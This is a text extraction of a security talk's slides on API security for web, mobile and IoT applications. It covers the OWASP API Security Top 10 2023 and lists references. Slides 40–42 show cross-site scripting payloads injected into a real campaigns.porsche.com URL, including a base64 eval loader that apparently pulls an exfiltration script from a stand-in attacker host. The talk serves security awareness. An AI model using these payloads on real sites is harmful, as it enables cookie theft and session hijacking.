BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number Systems
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.ppt
 

Web Apps APIs' Nightmare Guide

  • 2. ● Security Researcher/Pentester ● 15+ years as a Software Developer ● Long-term OWASP Volunteer ● Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs’ Nightmare
  • 4.
  • 5.
  • 6.
  • 7. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET / Content-Type: text/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php login.php . . .
  • 8. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 9. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 10. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 11. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
  • 12. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript php index.php login.php . . . POST /login.php Content-Type: text/html
  • 13.
  • 14. Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
  • 15. Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
  • 16. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
  • 17. Web Apps: APIs’ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
  • 18. Web Apps: APIs’ Nightmare
  • 19. Web Apps: APIs’ Nightmare
  • 20. Web Apps: APIs’ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
  • 21. Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
  • 22. Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
  • 23. Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
  • 24. Web Apps: APIs’ Nightmare Modern Web Applications Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ...
  • 25. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
  • 26. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
  • 27. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
  • 28. Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
  • 29. Web Apps: APIs’ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
  • 30. API API API API API API API API API API API API API Web Apps: APIs’ Nightmare API
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40. Web Apps: APIs’ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=alert(document.cookie)>
  • 41. Web Apps: APIs’ Nightmare Loader Payload Cross-Site Scripting
  • 42. Web Apps: APIs’ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=eval(atob(“KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==”))> Payload Cross-Site Scripting
  • 43. Web Apps: APIs’ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
  • 44.
  • 45.
  • 46. Web Apps: APIs’ Nightmare OWASP Resources Other References ● OWASP API Security Project ● OWASP API Security Top 10 2023 ● OWASP API Security Top 10 2019 ● Goats ● OWASP Vulnerable Web Applications Directory ● OWASP crAPI - Completely Ridiculous API ● OWASP Juice Shop ● OWASP Cheat Sheets Series ● Authentication Cheat Sheet ● Authorization Cheat Sheet ● GraphQL Cheat Sheet ● REST Security Cheat Sheet ● Web Service Security Cheat Sheet ● OWASP Secure Coding Practices-Quick Reference Guide ● OWASP Go Secure Coding Practices Guide ● HTTP ● Basic of HTTP - mdn web docs ● Cross-Origin Resource Sharing (CORS) - mdn web docs ● API Protocols ● REST ● Representational state transfer - Wikipedia ● Representational State Transfer (REST) - Fielding Dissertation ● RPC ● Remote procedure call - Wikipedia ● OpenRPC ● JSON-RPC ● XML-RPC ● gRPC ● GraphQL ● Introduction to GraphQL ● GraphQL blogposts Series - Checkmarx ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify ● MindAPI ● MindAPI References
  • 47. Web Apps: APIs’ Nightmare OWASP Resources Other References